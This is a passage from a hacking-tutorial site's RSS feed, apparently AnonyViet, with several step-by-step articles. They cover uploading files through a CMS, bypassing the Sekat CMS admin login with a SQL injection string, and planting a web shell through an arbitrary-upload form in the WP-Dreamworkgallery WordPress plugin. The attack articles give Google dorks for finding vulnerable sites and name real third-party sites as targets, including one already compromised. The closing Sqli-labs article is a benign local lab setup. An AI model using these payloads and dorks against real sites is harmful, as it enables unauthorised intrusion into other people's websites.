<p>The CMS to Upload File has appeared, note the 3 arrow marks I recorded in the picture<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F5-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-3481" src="https://anonyviet.com/wp-content/uploads/2017/01/5-1.jpg" alt="Guide to exploiting CMS Upload Website error 2017 12" width="1284" height="636" srcset="https://anonyviet.com/wp-content/uploads/2017/01/5-1.jpg 1284w, https://anonyviet.com/wp-content/uploads/2017/01/5-1-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/01/5-1-1024x507.jpg 1024w, https://anonyviet.com/wp-content/uploads/2017/01/5-1-768x380.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/01/5-1-750x371.jpg 750w, https://anonyviet.com/wp-content/uploads/2017/01/5-1-1140x565.jpg 1140w" sizes="auto, (max-width: 1284px) 100vw, 1284px" title="Guide to exploiting CMS Upload Website 2017 error 15"/></a>Now let&#8217;s try to upload a file to see</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F7-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-3483" src="https://anonyviet.com/wp-content/uploads/2017/01/7-1.jpg" alt="Instructions for exploiting CMS Upload Website error 2017 13" width="1366" height="638" srcset="https://anonyviet.com/wp-content/uploads/2017/01/7-1.jpg 1366w, https://anonyviet.com/wp-content/uploads/2017/01/7-1-300x140.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/01/7-1-1024x478.jpg 1024w, https://anonyviet.com/wp-content/uploads/2017/01/7-1-768x359.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/01/7-1-750x350.jpg 750w, https://anonyviet.com/wp-content/uploads/2017/01/7-1-1140x532.jpg 1140w" sizes="auto, (max-width: 1366px) 100vw, 1366px" title="Instructions for exploiting the CMS Upload Website 2017 error 16"/></a></p>
<p>Once the upload is complete, click the . button <strong><<Return to files list</strong> to go out again and select the File just Uploaded, right click to get the Link</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F8-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-3484" src="https://anonyviet.com/wp-content/uploads/2017/01/8-1.jpg" alt="Guide to exploiting CMS Upload Website error 2017 14" width="410" height="318" srcset="https://anonyviet.com/wp-content/uploads/2017/01/8-1.jpg 410w, https://anonyviet.com/wp-content/uploads/2017/01/8-1-300x233.jpg 300w" sizes="auto, (max-width: 410px) 100vw, 410px" title="Guide to exploiting CMS Upload Website error 2017 17"/></a></p>
<p><strong>Achievement:</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2FCapture-2.png" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-3485" src="https://anonyviet.com/wp-content/uploads/2017/01/Capture-2.png" alt="Guide to exploiting CMS Upload Website 2017 error 15" width="599" height="210" srcset="https://anonyviet.com/wp-content/uploads/2017/01/Capture-2.png 599w, https://anonyviet.com/wp-content/uploads/2017/01/Capture-2-300x105.png 300w" sizes="auto, (max-width: 599px) 100vw, 599px" title="Instructions for exploiting CMS Upload Website error 2017 18"/></a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;3476&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-for-exploiting-cms-upload-website-error-2017/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/01/12035-hacked_article.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Instructions for exploiting Sekat CMS vulnerabilities</title>
		<link>https://en.anonyviet.com/instructions-for-exploiting-sekat-cms-vulnerabilities/</link>
					<comments>https://en.anonyviet.com/instructions-for-exploiting-sekat-cms-vulnerabilities/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 30 Jan 2023 08:04:33 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Cms]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Instructions]]></category>
		<category><![CDATA[Sekat]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6674</guid>

					<description><![CDATA[Sekat CMS is currently suffering from a SQL Injection vulnerability, with only a few tips small, you can access the Admin admin rights of the Website, without having to spend a lot of time to exploit. Join the channel Telegram of the AnonyViet 👉 Link 👈 I&#8217;ll go straight to the point Step 1: Find [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><strong>Sekat CMS is currently suffering from a SQL Injection vulnerability, with only a few <span style="color: #000000;"><a target="_blank" style="color: #000000;" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com" rel="noopener" class="local-link">tips</a></span>  small, you can access the Admin admin rights of the Website, without having to spend a lot of time to exploit.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>I&#8217;ll go straight to the point</p>
<p><span style="color: #008080; font-size: 14pt;"><strong>Step 1:</strong></span>  Find the <span style="color: #008000;">Website </span>use <span style="color: #33cccc;">Sket CMS</span> by Google</p>
<p>Enter the search command below into Google Search</p>
<pre class="lang:default decode:true">intext:"Developed by Sekat Technologies" -site:https://cxsecurity.com&#13;
</pre>
</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F03%2F1-1.jpg" rel="noopener" class="local-link"><img decoding="async" class="td-modal-image wp-image-4841  aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/03/1-1.jpg" alt="Instructions for exploiting the vulnerability of Sekat CMS 8" width="414" height="182" srcset="https://anonyviet.com/wp-content/uploads/2017/03/1-1.jpg 859w, https://anonyviet.com/wp-content/uploads/2017/03/1-1-300x132.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/03/1-1-768x338.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/03/1-1-750x330.jpg 750w" sizes="(max-width: 414px) 100vw, 414px" title="Instructions for exploiting the vulnerability of Sekat CMS 9"/></a></p>
<p><span style="font-size: 14pt;"><strong><span style="color: #008080;">Step 2:</span></strong></span>  Choose any 1 <span style="color: #008000;">Website</span> listed in Google</p>
<p>I will choose the page: <span style="color: #0000ff;">http://unstccs.com</span> to Test</p>
<p><span style="color: #008080; font-size: 14pt;"><strong>Step 3:</strong></span>  Access the Weblogin Admin using the link below</p>
<p><span class="td_text_highlight_marker_blue td_text_highlight_marker" style="color: #3366ff;">http://namewebiste.com<span style="color: #ffff00;">/member_login.php</span></span></p>
<p><span style="color: #800080;">Specifically would be:</span></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F03%2F2-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="alignnone wp-image-4842 size-full" src="https://anonyviet.com/wp-content/uploads/2017/03/2-1.jpg" alt="Instructions for exploiting the vulnerability of Sekat CMS 9" width="829" height="34" srcset="https://anonyviet.com/wp-content/uploads/2017/03/2-1.jpg 829w, https://anonyviet.com/wp-content/uploads/2017/03/2-1-300x12.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/03/2-1-768x31.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/03/2-1-750x31.jpg 750w" sizes="auto, (max-width: 829px) 100vw, 829px" title="Instructions for exploiting the vulnerability of Sekat CMS 10"/></a></p>
<p><span style="color: #008080; font-size: 14pt;"><strong>Step 4: </strong></span><span style="color: #000000;"><a target="_blank" style="color: #000000;" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com" rel="noopener" class="local-link">Exploit bugs</a> sign in</span>p equals fill <span style="color: #800080;">User</span> and <span style="color: #0000ff;">Pass</span> as below:</p>
<pre class="lang:default decode:true">Username: '=' 'or'&#13;
Password: '=' 'or'</pre>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F03%2F3-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class=" wp-image-4843 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/03/3-1.jpg" alt="Instructions for exploiting the vulnerability of Sekat CMS 10" width="269" height="209" srcset="https://anonyviet.com/wp-content/uploads/2017/03/3-1.jpg 369w, https://anonyviet.com/wp-content/uploads/2017/03/3-1-300x234.jpg 300w" sizes="auto, (max-width: 269px) 100vw, 269px" title="Instructions for exploiting the vulnerability of Sekat CMS 11"/></a></p>
<p><strong><span style="color: #008080; font-size: 14pt;">Step 5:</span></strong>  Access to Admin rights, the next thing is yours</p>
<p>Should only be used for learning, do not destroy others</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F03%2F4-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="wp-image-4844 aligncenter" src="https://anonyviet.com/wp-content/uploads/2017/03/4-1.jpg" alt="Instructions for exploiting the vulnerability of Sekat CMS 11" width="532" height="354" srcset="https://anonyviet.com/wp-content/uploads/2017/03/4-1.jpg 1426w, https://anonyviet.com/wp-content/uploads/2017/03/4-1-300x200.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/03/4-1-1024x681.jpg 1024w, https://anonyviet.com/wp-content/uploads/2017/03/4-1-768x511.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/03/4-1-750x499.jpg 750w, https://anonyviet.com/wp-content/uploads/2017/03/4-1-1140x759.jpg 1140w" sizes="auto, (max-width: 532px) 100vw, 532px" title="Instructions for exploiting the vulnerability of Sekat CMS 12"/></a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;4839&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-for-exploiting-sekat-cms-vulnerabilities/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/03/5-1.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Exploiting the WordPress Plugin WP-Dreamworkgallery Vulnerability</title>
		<link>https://en.anonyviet.com/exploiting-the-wordpress-plugin-wp-dreamworkgallery-vulnerability/</link>
					<comments>https://en.anonyviet.com/exploiting-the-wordpress-plugin-wp-dreamworkgallery-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 30 Jan 2023 06:21:26 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Plugin]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[WPDreamworkgallery]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6626</guid>

					<description><![CDATA[This bug allows us to comfortably UpShell via a .html file right from localhost Join the channel Telegram of the AnonyViet 👉 Link 👈 Step 1: Create a file Upload.html &#60;html&#62;&#13; &#60;body&#62;&#13; &#60;form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"&#62;&#13; &#60;input type="hidden" name="task" value="drm_add_new_album" /&#62;&#13; &#60;input type="hidden" name="album_name" value="Arbitrary File Upload" /&#62;&#13; &#60;input type="hidden" name="album_desc" value="Arbitrary File Upload" /&#62;&#13; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>This bug allows us to comfortably UpShell via a .html file right from localhost</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><a href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DP_ejHXYtwY0">https://www.youtube.com/watch?v=P_ejHXYtwY0</a></p>
<p><span style="color: #008000;"><strong>Step 1:</strong></span>  Create a file Upload.html</p>
<pre class="lang:php decode:true">&lt;html&gt;&#13;
&lt;body&gt;&#13;
&lt;form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"&gt;&#13;
&lt;input type="hidden" name="task" value="drm_add_new_album" /&gt;&#13;
&lt;input type="hidden" name="album_name" value="Arbitrary File Upload" /&gt;&#13;
&lt;input type="hidden" name="album_desc" value="Arbitrary File Upload" /&gt;&#13;
&lt;input type="file" name="album_img" value="" /&gt;&#13;
&lt;input type="submit" value="Submit" /&gt;&#13;
&lt;/form&gt;&#13;
&lt;/body&gt;&#13;
&lt;/html&gt;</pre>
<p><span style="color: #008000;"><strong>Step 2:</strong></span>  Find the wrong Web</p>
<p>Find the error by going to Google.com and typing the command</p>
<pre class="lang:default decode:true ">inurl:/wp-content/plugins/wp-dreamworkgallery/</pre>
<p><span style="color: #008000;"><strong>Step 3:</strong></span>  Choose any site</p>
<p>Replace the broken website link in the code in Step 1, remember to save it</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F04%2F2x.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-5015" src="https://anonyviet.com/wp-content/uploads/2017/04/2x.jpg" alt="Exploiting WordPress Plugin Vulnerability WP-Dreamworkgallery 3" width="872" height="510" srcset="https://anonyviet.com/wp-content/uploads/2017/04/2x.jpg 872w, https://anonyviet.com/wp-content/uploads/2017/04/2x-300x175.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/04/2x-768x449.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/04/2x-750x439.jpg 750w" sizes="auto, (max-width: 872px) 100vw, 872px" title="Exploiting WordPress Plugin Vulnerability WP-Dreamworkgallery 7"/></a></p>
<p><span style="color: #008000;"><strong>Step 4:</strong></span> Up Shell</p>
<p>Open File <strong><span style="color: #0000ff;">Upload.html</span></strong>  in Step 1 up, and Up Shell up</p>
<p><span style="color: #008000;"><strong>Note:</strong> </span>The error after Up shell</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F04%2F3x.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-5016" src="https://anonyviet.com/wp-content/uploads/2017/04/3x.jpg" alt="Exploiting the WordPress Plugin Vulnerability WP-Dreamworkgallery 4" width="1913" height="68" srcset="https://anonyviet.com/wp-content/uploads/2017/04/3x.jpg 1913w, https://anonyviet.com/wp-content/uploads/2017/04/3x-300x11.jpg 300w, https://anonyviet.com/wp-content/uploads/2017/04/3x-1024x36.jpg 1024w, https://anonyviet.com/wp-content/uploads/2017/04/3x-768x27.jpg 768w, https://anonyviet.com/wp-content/uploads/2017/04/3x-1536x55.jpg 1536w, https://anonyviet.com/wp-content/uploads/2017/04/3x-750x27.jpg 750w, https://anonyviet.com/wp-content/uploads/2017/04/3x-1140x41.jpg 1140w" sizes="auto, (max-width: 1913px) 100vw, 1913px" title="Exploiting WordPress Plugin Vulnerability WP-Dreamworkgallery 8"/></a></p>
<p>Copy this line to the broken site Link is OK</p>
<p>http://www.pressprint.rs<span style="color: #ff0000;">/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html</span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;5014&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exploiting-the-wordpress-plugin-wp-dreamworkgallery-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/04/exploit-exchange.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Practice exploiting SQL injection errors with Sqli-labs</title>
		<link>https://en.anonyviet.com/practice-exploiting-sql-injection-errors-with-sqli-labs/</link>
					<comments>https://en.anonyviet.com/practice-exploiting-sql-injection-errors-with-sqli-labs/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 06:20:24 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[errors]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[practice]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Sqlilabs]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6027</guid>

					<description><![CDATA[SQL injection is a method that allows hackers to take advantage of the vulnerability of the Website&#8217;s input data checking and the error messages returned by the database management system to inject and execute commands. Illegal SQL. SQL injection helps hackers to execute commands like select, insert, update, delete etc right on the web browser, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p style="text-align: justify;"><strong>SQL injection is a method that allows hackers to take advantage of the vulnerability of the Website&#8217;s input data checking and the error messages returned by the database management system to inject and execute commands. Illegal SQL.  SQL injection helps hackers to execute commands like select, insert, update, delete etc right on the web browser, even the server the application is running on.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p style="text-align: justify;">Although, it has been many years since the first SQLi vulnerability was discovered. SQLi is still a very common vulnerability in web applications.  Almost all credit card (CC) thefts are exploited from this vulnerability.  Previously, online stores were mostly exploited SQL injection to steal information of shoppers.  Now it&#8217;s much better.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F08%2F11-08-2018-04-35-54.png" rel="noopener" class="local-link"><img post-id="6027" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-10744" src="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54.png" alt="Practice exploiting SQL injection errors with Sqli-labs" title="Practice exploiting SQL injection errors with Sqli-labs" width="740" height="391" srcset="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54.png 740w, https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54-300x159.png 300w" sizes="(max-width: 740px) 100vw, 740px" title="Practice exploiting SQL injection errors with Sqli-labs 8"/></a></p>
<p style="text-align: justify;">Aim to hone SQLi vulnerability detection skills.  Member DDos (of the WhiteHat forum) introduces the sqli-labs project to you.  This project includes 65 different labs with increasing difficulty.  The contents of sqli-labs include almost all possible paths to SQLi errors such as: GET/POST request, User-Agent&#8230;</p>
<h2 style="text-align: justify;">Practice exploiting SQL injection errors with Sqli-labs</h2>
<p>To install sqli-lab, you need:</p>
<p>You can install software <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.apachefriends.org%2Fdownload.html" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Xamp (version 5.6) </a>or <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.ampps.com%2Fdownload" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Amp </a>to simulate PHP, MySQL environment on Windows.  Or practice right on a Linux virtual machine (Centos, Ubuntu, Kali Linux).</p>
<p><strong><span style="color: #0000ff;">I will guide you to practice on Windows with Xampp emulator software.</span></strong></p>
<p><strong><span style="font-size: 14pt;">Step 1</span>:</strong> Load <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.apachefriends.org%2Fdownload.html" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Xamp (using version 5.6)</a></strong>and proceed with the installation as usual.</p>
<p>Delete all files in the directory: <strong>C:\xampp\htdocs</strong></p>
<p><span style="font-size: 14pt;"><strong>Step 2:</strong> </span>Open Xampp Control Panel</p>
<p>Press the button<strong> Start</strong> Apache, MySQL.  (If Start doesn&#8217;t work, see how to fix the error at <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhoangluyen.com%2Fhai-cach-sua-loi-apache-khong-start-duoc-trong-xampp%2F" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">this lesson)</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F08%2F11-08-2018-03-42-24.png" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-10739 size-full" src="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-03-42-24.png" alt="Sqli-labs" width="553" height="363" srcset="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-03-42-24.png 553w, https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-03-42-24-300x197.png 300w" sizes="auto, (max-width: 553px) 100vw, 553px" title="Practice exploiting SQL injection errors with Sqli-labs 9"/></a></p>
<p><span style="font-size: 14pt;"><strong>Step 3:</strong></span>  You download the Sqli-labs installation package at the link below</p>
<p><span style="font-size: 14pt;"><strong>Step 4</strong>:</span> Extract the downloaded file, and copy it to the folder <strong>C:\xampp\htdocs</strong></p>
<p><span style="font-size: 14pt;"><strong>Step 5: </strong></span>Access the link <strong>http://localhost</strong> on the Web browser.</p>
<p>Click on <span style="color: #e4287c;">Setup/reset Database for labs </span>to start installing data for Sqli-labs</p>
<p>If you see the image below, the installation is successful.<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F08%2F11-08-2018-04-22-19.png" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-10741 size-full" src="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-22-19.png" alt="Sqli-labs" width="738" height="462" srcset="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-22-19.png 738w, https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-22-19-300x188.png 300w" sizes="auto, (max-width: 738px) 100vw, 738px" title="Practice exploiting SQL injection errors with Sqli-labs 10"/></a></p>
<p><strong>Step 6:</strong> Go back to localhost home page and click on <span style="color: #ff0040; font-size: 14pt;">SQLi-LABS Page-1<i>(Basic Challenges)</i></span>  to start learning from lesson 1.</p>
<p>If you find it difficult to practice SQLi-Labs exercises, check out the channels <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Ddu-jkS6-sbo%26amp%3Blist%3DPLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Tutorials on Youtube</a>.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;10738&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/practice-exploiting-sql-injection-errors-with-sqli-labs/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
